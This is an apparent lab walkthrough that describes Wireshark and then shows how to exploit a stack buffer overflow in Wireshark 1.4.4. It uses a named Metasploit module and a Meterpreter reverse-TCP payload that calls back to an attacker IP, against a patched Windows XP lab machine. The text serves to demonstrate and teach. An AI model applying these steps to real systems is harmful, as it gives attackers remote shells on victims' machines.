Critical System Protection

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

 

Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. There is also a terminal-based (non-GUI) version called TShark. Wireshark, and the other programs distributed with it such as TShark, are free software, released under the terms of the GNU General Public License.

 

This module exploits a stack buffer overflow in Wireshark <= 1.4.4 When opening a malicious .pcap file in Wireshark, a stack buffer occurs, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7.

 

 

1) Our Victim is using windows xp professional SP3 and its IP Address is 192.168.42.78

 

    

 

2) Our Victim is using Fully patched Operating system.

 

    

 

3) Our victim also installed Symantec Endpoint Protection 12 and its fully updated.

 

    

 

4) Wireshark 1.4.4 is also installed on our Victim Machine.

 

    

 

5) I am using Backtrack 5 R1 as Attacker machine and its IP Address is 192.168.42.62

 

6) Our Victim is using wireshark to capture packets.

 

    

 

7) I am using exploit/windows/misc/wireshark_packet_dect metasploit module for wireshark stack buffer overflow. Write show options and hit enter.

 

    

 

8) I have to specify the interface of machine through which i am connected to network.

 

    

 

9) I am using windows/meterpreter/reverse_tcp payload.

 

    

 

10) Now i have to enter LHOST (Local Host) i.e 192.168.42.62 (Attacker Machine IP Address).

 

    

 

11) Write Exploit and Hit Enter. Our Exploit and Payload successfully executed on Victim Machine and Attacker gets the meterpreter session of Victim Machine.

 

     

 

 

12) Let's type ipconfig command to verify Whether we enter into victim machine or not.

 

     

 

Note: This attack doesn’t always success 100%, if there’s no one using their wireshark to capture data in a network then your exploit will return error message.